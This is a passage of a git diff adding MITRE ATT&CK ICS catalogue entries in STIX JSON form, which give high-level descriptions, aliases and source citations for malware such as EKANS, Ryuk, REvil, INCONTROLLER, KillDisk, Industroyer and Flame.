"[EKANS](https://collaborate.mitre.org/attackics/index.php/Software/S0017) is ransomware that was first seen December 2019 and later reported to have impacted operations at Honda automotive production facilities.(Citation: Forbes Snake Ransomware June 2020)(Citation: MalwareByes Honda and Enel Ransomware June 2020)(Citation: Dragos EKANS February 2020) EKANS has a hard-coded kill-list of processes, including some associated with common ICS software platforms (e.g., GE Proficy historian, Honeywell HMIWeb).(Citation: Dragos EKANS February 2020) If the malware discovers these processes on the target system, it will stop, encrypt, and rename the process to prevent the program from restarting. This malware should not be confused with the \u201cSnake\u201d malware associated with the Turla group. The ICS processes documented within the malware\u2019s kill-list is similar to those defined by the MEGACORTEX software.(Citation: FireEye OT Ransomware July 2020)(Citation: Pylos January 2020)(Citation: Dragos EKANS June 2020)The ransomware was initially reported as \u201cSnake\u201d, however, to avoid confusion with the unrelated Turla APT group security researchers spelled it backwards as EKANS.", + "external_references": [ + { + "source_name": "mitre-ics-attack", + "external_id": "S0017", + "url": "https://collaborate.mitre.org/attackics/index.php/Software/S0017" + }, + { + "source_name": "Forbes Snake Ransomware June 2020", + "description": "Davey Winder. (2020, June 10). Honda Hacked: Japanese Car Giant Confirms Cyber Attack On Global Operations. Retrieved April 12, 2021.", + "url": "https://www.forbes.com/sites/daveywinder/2020/06/10/honda-hacked-japanese-car-giant-confirms-cyber-attack-on-global-operations-snake-ransomware/?sh=2725c35753ad" + }, + { + "source_name": "MalwareByes Honda and Enel Ransomware June 2020", + "description": "MalwareBytes. (2020, June 09). Honda and Enel impacted by cyber attack suspected to be ransomware. Retrieved April 12, 2021.", + "url": "https://blog.malwarebytes.com/threat-analysis/2020/06/honda-and-enel-impacted-by-cyber-attack-suspected-to-be-ransomware/" + }, + { + "source_name": "Dragos EKANS February 2020", + "description": "Dragos Threat Intelligence. (2020, February 03). EKANS Ransomware and ICS Operations. Retrieved April 12, 2021.", + "url": "https://www.dragos.com/blog/industry-news/ekans-ransomware-and-ics-operations/" + }, + { + "source_name": "FireEye OT Ransomware July 2020", + "description": "Nathan Brubaker, Daniel Kapellmann Zafra, Keith Lunden, Ken Proska, Corey Hildebrandt. (2020, July 15). Financially Motivated Actors Are Expanding Access Into OT: Analysis of Kill Lists That Include OT Processes Used With Seven Malware Families. Retrieved April 12, 2021.", + "url": "https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html" + }, + { + "source_name": "Pylos January 2020", + "description": "Joe Slowik. (2020, January 28). Getting the Story Right, and Why It Matters. Retrieved April 12, 2021.", + "url": "https://pylos.co/2020/01/28/getting-the-story-right-and-why-it-matters/" + }, + { + "source_name": "Dragos EKANS June 2020", + "description": "Joe Slowik. (2020, June 18). EKANS Ransomware Misconceptions and Misunderstandings. Retrieved April 12, 2021.", + "url": "https://www.dragos.com/blog/industry-news/ekans-ransomware-misconceptions-and-misunderstandings/#_edn7" + } + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "id": "malware--9e3c9495-5fbd-4676-b3ac-ddecceb57b8f", + "name": "EKANS", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/malware/malware--a020a61c-423f-4195-8c46-ba1d21abba37.json b/cti-ATT-CK-v13.1/ics-attack/malware/malware--a020a61c-423f-4195-8c46-ba1d21abba37.json new file mode 100644 index 0000000000000000000000000000000000000000..1bd8105d8b5d7a88c83ce30daa39c30cfda649c5 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/malware/malware--a020a61c-423f-4195-8c46-ba1d21abba37.json @@ -0,0 +1,72 @@ +{ + "type": "bundle", + "id": "bundle--837242f4-62b8-4a41-9f21-2f57aecea834", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_contributors": [ + "The DFIR Report, @TheDFIRReport", + "Matt Brenton, Zurich Insurance Group" + ], + "x_mitre_aliases": [ + "Ryuk" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "malware", + "id": "malware--a020a61c-423f-4195-8c46-ba1d21abba37", + "created": "2020-05-13T20:14:53.171Z", + "x_mitre_version": "1.3", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "S0446", + "url": "https://attack.mitre.org/software/S0446" + }, + { + "source_name": "Ryuk", + "description": "(Citation: CrowdStrike Ryuk January 2019) (Citation: Bleeping Computer - Ryuk WoL) " + }, + { + "source_name": "Bleeping Computer - Ryuk WoL", + "url": "https://www.bleepingcomputer.com/news/security/ryuk-ransomware-uses-wake-on-lan-to-encrypt-offline-devices/", + "description": "Abrams, L. (2021, January 14). Ryuk Ransomware Uses Wake-on-Lan To Encrypt Offline Devices. Retrieved February 11, 2021." + }, + { + "source_name": "FireEye Ryuk and Trickbot January 2019", + "url": "https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html", + "description": "Goody, K., et al (2019, January 11). A Nasty Trick: From Credential Theft Malware to Business Disruption. Retrieved May 12, 2020." + }, + { + "source_name": "CrowdStrike Ryuk January 2019", + "url": "https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/", + "description": "Hanel, A. (2019, January 10). Big Game Hunting with Ryuk: Another Lucrative Targeted Ransomware. Retrieved May 12, 2020." + }, + { + "source_name": "FireEye FIN6 Apr 2019", + "url": "https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html", + "description": "McKeague, B. et al. (2019, April 5). Pick-Six: Intercepting a FIN6 Intrusion, an Actor Recently Tied to Ryuk and LockerGoga Ransomware. Retrieved April 17, 2019." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Ryuk](https://attack.mitre.org/software/S0446) is a ransomware designed to target enterprise environments that has been used in attacks since at least 2018. [Ryuk](https://attack.mitre.org/software/S0446) shares code similarities with Hermes ransomware.(Citation: CrowdStrike Ryuk January 2019)(Citation: FireEye Ryuk and Trickbot January 2019)(Citation: FireEye FIN6 Apr 2019)", + "modified": "2022-05-24T21:10:44.381Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Ryuk", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/malware/malware--a4a98eab-b691-45d9-8c48-869ef8fefd57.json b/cti-ATT-CK-v13.1/ics-attack/malware/malware--a4a98eab-b691-45d9-8c48-869ef8fefd57.json new file mode 100644 index 0000000000000000000000000000000000000000..3a287cbf891f1fe185095c812b46f52d9683ac6a --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/malware/malware--a4a98eab-b691-45d9-8c48-869ef8fefd57.json @@ -0,0 +1,45 @@ +{ + "type": "bundle", + "id": "bundle--6a3280e9-d3ac-4ad3-a1af-8dad84d433fd", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-12T17:15:44.068Z", + "name": "ACAD/Medre.A", + "description": "[ACAD/Medre.A](https://attack.mitre.org/software/S1000) is a worm that steals operational information. The worm collects AutoCAD files with drawings. [ACAD/Medre.A](https://attack.mitre.org/software/S1000) has the capability to be used for industrial espionage.(Citation: ESET)", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_aliases": [ + "ACAD/Medre.A" + ], + "type": "malware", + "id": "malware--a4a98eab-b691-45d9-8c48-869ef8fefd57", + "created": "2017-05-31T21:32:59.661Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S1000", + "external_id": "S1000" + }, + { + "source_name": "ESET", + "description": "ESET ACAD/Medre.A: 10000s of AutoCAD Designs Leaked in Suspected Industrial Espionage Retrieved. 2021/04/13 ", + "url": "https://www.welivesecurity.com/wp-content/uploads/200x/white-papers/ESET_ACAD_Medre_A_whitepaper.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/malware/malware--ac61f1f9-7bb1-465e-9b8a-c2ce8e88baf5.json b/cti-ATT-CK-v13.1/ics-attack/malware/malware--ac61f1f9-7bb1-465e-9b8a-c2ce8e88baf5.json new file mode 100644 index 0000000000000000000000000000000000000000..2871cf2af402ce8e6a7d70a979eb969a979dd8f0 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/malware/malware--ac61f1f9-7bb1-465e-9b8a-c2ce8e88baf5.json @@ -0,0 +1,117 @@ +{ + "type": "bundle", + "id": "bundle--b292fc1d-b73c-4699-93df-13f31a2c4f6a", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-26T20:06:33.317Z", + "name": "REvil", + "description": "[REvil](https://attack.mitre.org/software/S0496) is a ransomware family that has been linked to the [GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) group and operated as ransomware-as-a-service (RaaS) since at least April 2019. [REvil](https://attack.mitre.org/software/S0496), which as been used against organizations in the manufacturing, transportation, and electric sectors, is highly configurable and shares code similarities with the GandCrab RaaS.(Citation: Secureworks REvil September 2019)(Citation: Intel 471 REvil March 2020)(Citation: Group IB Ransomware May 2020)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_version": "2.1", + "x_mitre_contributors": [ + "Edward Millington" + ], + "x_mitre_aliases": [ + "REvil", + "Sodin", + "Sodinokibi" + ], + "type": "malware", + "id": "malware--ac61f1f9-7bb1-465e-9b8a-c2ce8e88baf5", + "created": "2020-08-04T15:06:14.796Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0496", + "external_id": "S0496" + }, + { + "source_name": "Sodin", + "description": "(Citation: Intel 471 REvil March 2020)(Citation: Kaspersky Sodin July 2019)" + }, + { + "source_name": "Sodinokibi", + "description": "(Citation: Secureworks REvil September 2019)(Citation: Intel 471 REvil March 2020)(Citation: G Data Sodinokibi June 2019)(Citation: Kaspersky Sodin July 2019)(Citation: Cylance Sodinokibi July 2019)(Citation: Secureworks GandCrab and REvil September 2019)(Citation: Talos Sodinokibi April 2019)(Citation: McAfee Sodinokibi October 2019)(Citation: McAfee REvil October 2019)(Citation: Picus Sodinokibi January 2020)(Citation: Secureworks REvil September 2019)(Citation: Tetra Defense Sodinokibi March 2020)" + }, + { + "source_name": "Talos Sodinokibi April 2019", + "description": "Cadieux, P, et al (2019, April 30). Sodinokibi ransomware exploits WebLogic Server vulnerability. Retrieved August 4, 2020.", + "url": "https://blog.talosintelligence.com/2019/04/sodinokibi-ransomware-exploits-weblogic.html" + }, + { + "source_name": "Secureworks REvil September 2019", + "description": "Counter Threat Unit Research Team. (2019, September 24). REvil/Sodinokibi Ransomware. Retrieved August 4, 2020.", + "url": "https://www.secureworks.com/research/revil-sodinokibi-ransomware" + }, + { + "source_name": "Cylance Sodinokibi July 2019", + "description": "Cylance. (2019, July 3). hreat Spotlight: Sodinokibi Ransomware. Retrieved August 4, 2020.", + "url": "https://threatvector.cylance.com/en_us/home/threat-spotlight-sodinokibi-ransomware.html" + }, + { + "source_name": "Group IB Ransomware May 2020", + "description": "Group IB. (2020, May). Ransomware Uncovered: Attackers\u2019 Latest Methods. Retrieved August 5, 2020.", + "url": "https://www.group-ib.com/whitepapers/ransomware-uncovered.html" + }, + { + "source_name": "G Data Sodinokibi June 2019", + "description": "Han, Karsten. (2019, June 4). Strange Bits: Sodinokibi Spam, CinaRAT, and Fake G DATA. Retrieved August 4, 2020.", + "url": "https://www.gdatasoftware.com/blog/2019/06/31724-strange-bits-sodinokibi-spam-cinarat-and-fake-g-data" + }, + { + "source_name": "Intel 471 REvil March 2020", + "description": "Intel 471 Malware Intelligence team. (2020, March 31). REvil Ransomware-as-a-Service \u2013 An analysis of a ransomware affiliate operation. Retrieved August 4, 2020.", + "url": "https://intel471.com/blog/revil-ransomware-as-a-service-an-analysis-of-a-ransomware-affiliate-operation/" + }, + { + "source_name": "Kaspersky Sodin July 2019", + "description": "Mamedov, O, et al. (2019, July 3). Sodin ransomware exploits Windows vulnerability and processor architecture. Retrieved August 4, 2020.", + "url": "https://securelist.com/sodin-ransomware/91473/" + }, + { + "source_name": "McAfee Sodinokibi October 2019", + "description": "McAfee. (2019, October 2). McAfee ATR Analyzes Sodinokibi aka REvil Ransomware-as-a-Service \u2013 What The Code Tells Us. Retrieved August 4, 2020.", + "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-what-the-code-tells-us/" + }, + { + "source_name": "Picus Sodinokibi January 2020", + "description": "Ozarslan, S. (2020, January 15). A Brief History of Sodinokibi. Retrieved August 5, 2020.", + "url": "https://www.picussecurity.com/blog/a-brief-history-and-further-technical-analysis-of-sodinokibi-ransomware" + }, + { + "source_name": "McAfee REvil October 2019", + "description": "Saavedra-Morales, J, et al. (2019, October 20). McAfee ATR Analyzes Sodinokibi aka REvil Ransomware-as-a-Service \u2013 Crescendo. Retrieved August 5, 2020.", + "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-crescendo/" + }, + { + "source_name": "Secureworks GandCrab and REvil September 2019", + "description": "Secureworks . (2019, September 24). REvil: The GandCrab Connection. Retrieved August 4, 2020.", + "url": "https://www.secureworks.com/blog/revil-the-gandcrab-connection" + }, + { + "source_name": "Tetra Defense Sodinokibi March 2020", + "description": "Tetra Defense. (2020, March). CAUSE AND EFFECT: SODINOKIBI RANSOMWARE ANALYSIS. Retrieved December 14, 2020.", + "url": "https://www.tetradefense.com/incident-response-services/cause-and-effect-sodinokibi-ransomware-analysis" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/malware/malware--d3aa1058-b1b3-4c29-a3ba-9a9b90ccd93b.json b/cti-ATT-CK-v13.1/ics-attack/malware/malware--d3aa1058-b1b3-4c29-a3ba-9a9b90ccd93b.json new file mode 100644 index 0000000000000000000000000000000000000000..e4e00978aa052a5939da8914f7b0822dc5d01f26 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/malware/malware--d3aa1058-b1b3-4c29-a3ba-9a9b90ccd93b.json @@ -0,0 +1,79 @@ +{ + "type": "bundle", + "id": "bundle--ca8d9702-4eb6-4584-b3b5-e8c7f2ad6751", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-17T16:23:24.812Z", + "name": "INCONTROLLER", + "description": "[INCONTROLLER](https://attack.mitre.org/software/S1045) is custom malware that includes multiple modules tailored towards ICS devices and technologies, including Schneider Electric and Omron PLCs as well as OPC UA, Modbus, and CODESYS protocols. [INCONTROLLER](https://attack.mitre.org/software/S1045) has the ability to discover specific devices, download logic on the devices, and exploit platform-specific vulnerabilities. As of September 2022, some security researchers assessed [INCONTROLLER](https://attack.mitre.org/software/S1045) was developed by CHERNOVITE.(Citation: CISA-AA22-103A)(Citation: Brubaker-Incontroller)(Citation: Dragos-Pipedream)(Citation: Schneider-Incontroller)(Citation: Wylie-22) ", + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED", + "Safety Instrumented System/Protection Relay", + "Engineering Workstation", + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_contributors": [ + "Jimmy Wylie, Dragos, Inc." + ], + "x_mitre_aliases": [ + "INCONTROLLER", + "PIPEDREAM" + ], + "type": "malware", + "id": "malware--d3aa1058-b1b3-4c29-a3ba-9a9b90ccd93b", + "created": "2022-09-28T20:07:40.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S1045", + "external_id": "S1045" + }, + { + "source_name": "PIPEDREAM", + "description": "(Citation: Dragos-Pipedream)(Citation: Wylie-22)" + }, + { + "source_name": "CISA-AA22-103A", + "description": "DHS/CISA. (2022, May 25). Alert (AA22-103A) APT Cyber Tools Targeting ICS/SCADA Devices. Retrieved September 28, 2022.", + "url": "https://www.cisa.gov/uscert/ncas/alerts/aa22-103a" + }, + { + "source_name": "Dragos-Pipedream", + "description": "DRAGOS. (2022, April 13). Pipedream: Chernovite\u2019s Emerging Malware Targeting Industrial Control Systems. Retrieved September 28, 2022.", + "url": "https://hub.dragos.com/hubfs/116-Whitepapers/Dragos_ChernoviteWP_v2b.pdf?hsLang=en" + }, + { + "source_name": "Wylie-22", + "description": "Jimmy Wylie. (2022, August). Analyzing PIPEDREAM: Challenges in Testing an ICS Attack Toolkit. Defcon 30.", + "url": "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Jimmy%20Wylie%20-%20Analyzing%20PIPEDREAM%20Challenges%20in%20testing%20an%20ICS%20attack%20toolkit.pdf" + }, + { + "source_name": "Brubaker-Incontroller", + "description": "Nathan Brubaker, Keith Lunden, Ken Proska, Muhammad Umair, Daniel Kapellmann Zafra, Corey Hildebrandt, Rob Caldwell. (2022, April 13). INCONTROLLER: New State-Sponsored Cyber Attack Tools Target Multiple Industrial Control Systems. Retrieved September 28, 2022.", + "url": "https://www.mandiant.com/resources/incontroller-state-sponsored-ics-tool" + }, + { + "source_name": "Schneider-Incontroller", + "description": "Schneider Electric. (2022, April 14). Schneider Electric Security Bulletin: \u201cAPT Cyber Tools Targeting ICS/SCADA Devices\u201d . Retrieved September 28, 2022.", + "url": "https://download.schneider-electric.com/files?p_Doc_Ref=SESB-2022-01" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/malware/malware--e221eb77-1502-4129-af1d-fe1ad55e7ec6.json b/cti-ATT-CK-v13.1/ics-attack/malware/malware--e221eb77-1502-4129-af1d-fe1ad55e7ec6.json new file mode 100644 index 0000000000000000000000000000000000000000..02d9029b66b046f4cb7e2625646afc673d317853 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/malware/malware--e221eb77-1502-4129-af1d-fe1ad55e7ec6.json @@ -0,0 +1,70 @@ +{ + "type": "bundle", + "id": "bundle--a84ff427-8c1b-4700-bcd5-9f862a1ac096", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-08T22:13:42.357Z", + "name": "KillDisk", + "description": "[KillDisk](https://attack.mitre.org/software/S0607) is a disk-wiping tool designed to overwrite files with random data to render the OS unbootable. It was first observed as a component of [BlackEnergy](https://attack.mitre.org/software/S0089) malware during cyber attacks against Ukraine in 2015. [KillDisk](https://attack.mitre.org/software/S0607) has since evolved into stand-alone malware used by a variety of threat actors against additional targets in Europe and Latin America; in 2016 a ransomware component was also incorporated into some [KillDisk](https://attack.mitre.org/software/S0607) variants.(Citation: KillDisk Ransomware)(Citation: ESEST Black Energy Jan 2016)(Citation: Trend Micro KillDisk 1)(Citation: Trend Micro KillDisk 2)", + "x_mitre_platforms": [ + "Linux", + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_aliases": [ + "KillDisk", + "Win32/KillDisk.NBI", + "Win32/KillDisk.NBH", + "Win32/KillDisk.NBD", + "Win32/KillDisk.NBC", + "Win32/KillDisk.NBB" + ], + "type": "malware", + "id": "malware--e221eb77-1502-4129-af1d-fe1ad55e7ec6", + "created": "2021-01-20T18:05:07.059Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0607", + "external_id": "S0607" + }, + { + "source_name": "KillDisk Ransomware", + "description": "Catalin Cimpanu. (2016, December 29). KillDisk Disk-Wiping Malware Adds Ransomware Component. Retrieved January 12, 2021.", + "url": "https://www.bleepingcomputer.com/news/security/killdisk-disk-wiping-malware-adds-ransomware-component/" + }, + { + "source_name": "ESEST Black Energy Jan 2016", + "description": "Cherepanov, A.. (2016, January 3). BlackEnergy by the SSHBearDoor: attacks against Ukrainian news media and electric industry. Retrieved May 18, 2016.", + "url": "http://www.welivesecurity.com/2016/01/03/blackenergy-sshbeardoor-details-2015-attacks-ukrainian-news-media-electric-industry/" + }, + { + "source_name": "Trend Micro KillDisk 1", + "description": "Fernando Merces, Byron Gelera, Martin Co. (2018, June 7). KillDisk Variant Hits Latin American Finance Industry. Retrieved January 12, 2021.", + "url": "https://www.trendmicro.com/en_us/research/18/f/new-killdisk-variant-hits-latin-american-financial-organizations-again.html" + }, + { + "source_name": "Trend Micro KillDisk 2", + "description": "Gilbert Sison, Rheniel Ramos, Jay Yaneza, Alfredo Oliveira. (2018, January 15). KillDisk Variant Hits Latin American Financial Groups. Retrieved January 12, 2021.", + "url": "https://www.trendmicro.com/en_us/research/18/a/new-killdisk-variant-hits-financial-organizations-in-latin-america.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/malware/malware--e401d4fe-f0c9-44f0-98e6-f93487678808.json b/cti-ATT-CK-v13.1/ics-attack/malware/malware--e401d4fe-f0c9-44f0-98e6-f93487678808.json new file mode 100644 index 0000000000000000000000000000000000000000..267624d534e04b6ce5bbd6b80713c4f2ed86b307 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/malware/malware--e401d4fe-f0c9-44f0-98e6-f93487678808.json @@ -0,0 +1,73 @@ +{ + "type": "bundle", + "id": "bundle--ecda400a-e104-4623-a754-e90807fd5315", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-20T20:37:50.556Z", + "name": "Industroyer", + "description": "[Industroyer](https://attack.mitre.org/software/S0604) is a sophisticated malware framework designed to cause an impact to the working processes of Industrial Control Systems (ICS), specifically components used in electrical substations.(Citation: ESET Industroyer) [Industroyer](https://attack.mitre.org/software/S0604) was used in the attacks on the Ukrainian power grid in December 2016.(Citation: Dragos Crashoverride 2017) This is the first publicly known malware specifically designed to target and impact operations in the electric grid.(Citation: Dragos Crashoverride 2018)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_contributors": [ + "Dragos Threat Intelligence", + "Joe Slowik - Dragos" + ], + "x_mitre_aliases": [ + "Industroyer", + "CRASHOVERRIDE", + "Win32/Industroyer" + ], + "type": "malware", + "id": "malware--e401d4fe-f0c9-44f0-98e6-f93487678808", + "created": "2021-01-04T20:42:21.997Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0604", + "external_id": "S0604" + }, + { + "source_name": "CRASHOVERRIDE", + "description": "(Citation: Dragos Crashoverride 2017)" + }, + { + "source_name": "Win32/Industroyer", + "description": "(Citation: ESET Industroyer)" + }, + { + "source_name": "ESET Industroyer", + "description": "Anton Cherepanov. (2017, June 12). Win32/Industroyer: A new threat for industrial controls systems. Retrieved December 18, 2020.", + "url": "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf" + }, + { + "source_name": "Dragos Crashoverride 2017", + "description": "Dragos Inc.. (2017, June 13). CRASHOVERRIDE Analysis of the Threat to Electric Grid Operations. Retrieved December 18, 2020.", + "url": "https://dragos.com/blog/crashoverride/CrashOverride-01.pdf" + }, + { + "source_name": "Dragos Crashoverride 2018", + "description": "Joe Slowik. (2018, October 12). Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE. Retrieved December 18, 2020.", + "url": "https://www.dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/malware/malware--ff6840c9-4c87-4d07-bbb6-9f50aa33d498.json b/cti-ATT-CK-v13.1/ics-attack/malware/malware--ff6840c9-4c87-4d07-bbb6-9f50aa33d498.json new file mode 100644 index 0000000000000000000000000000000000000000..3fde03545977e9c001ab99df33bed2ab6cee447e --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/malware/malware--ff6840c9-4c87-4d07-bbb6-9f50aa33d498.json @@ -0,0 +1,73 @@ +{ + "type": "bundle", + "id": "bundle--5fbee592-38c2-4db0-bf1f-a0438fa93c97", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-12T17:51:18.408Z", + "name": "Flame", + "description": "[Flame](https://attack.mitre.org/software/S0143) is a sophisticated toolkit that has been used to collect information since at least 2010, largely targeting Middle East countries. (Citation: Kaspersky Flame)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_aliases": [ + "Flame", + "Flamer", + "sKyWIper" + ], + "type": "malware", + "id": "malware--ff6840c9-4c87-4d07-bbb6-9f50aa33d498", + "created": "2017-05-31T21:33:21.973Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0143", + "external_id": "S0143" + }, + { + "source_name": "Flame", + "description": "(Citation: Kaspersky Flame)" + }, + { + "source_name": "sKyWIper", + "description": "(Citation: Kaspersky Flame) (Citation: Crysys Skywiper)" + }, + { + "source_name": "Flamer", + "description": "(Citation: Kaspersky Flame) (Citation: Symantec Beetlejuice)" + }, + { + "source_name": "Kaspersky Flame", + "description": "Gostev, A. (2012, May 28). The Flame: Questions and Answers. Retrieved March 1, 2017.", + "url": "https://securelist.com/the-flame-questions-and-answers-51/34344/" + }, + { + "source_name": "Crysys Skywiper", + "description": "sKyWIper Analysis Team. (2012, May 31). sKyWIper (a.k.a. Flame a.k.a. Flamer): A complex malware for targeted attacks. Retrieved September 6, 2018.", + "url": "https://www.crysys.hu/publications/files/skywiper.pdf" + }, + { + "source_name": "Symantec Beetlejuice", + "description": "Symantec Security Response. (2012, May 31). Flamer: A Recipe for Bluetoothache. Retrieved February 25, 2017.", + "url": "https://www.symantec.com/connect/blogs/flamer-recipe-bluetoothache" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/marking-definition/marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168.json b/cti-ATT-CK-v13.1/ics-attack/marking-definition/marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168.json new file mode 100644 index 0000000000000000000000000000000000000000..f089c64454a6399f57fe48de26932c3d20e8803c --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/marking-definition/marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168.json @@ -0,0 +1,18 @@ +{ + "type": "bundle", + "id": "bundle--e458d9eb-2f22-4954-a490-d84f5504adbd", + "spec_version": "2.0", + "objects": [ + { + "definition": { + "statement": "Copyright 2015-2023, The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation." + }, + "id": "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168", + "type": "marking-definition", + "created": "2017-06-01T00:00:00.000Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "definition_type": "statement", + "x_mitre_attack_spec_version": "2.1.0" + } + ] +} \ No newline at end of file diff --git 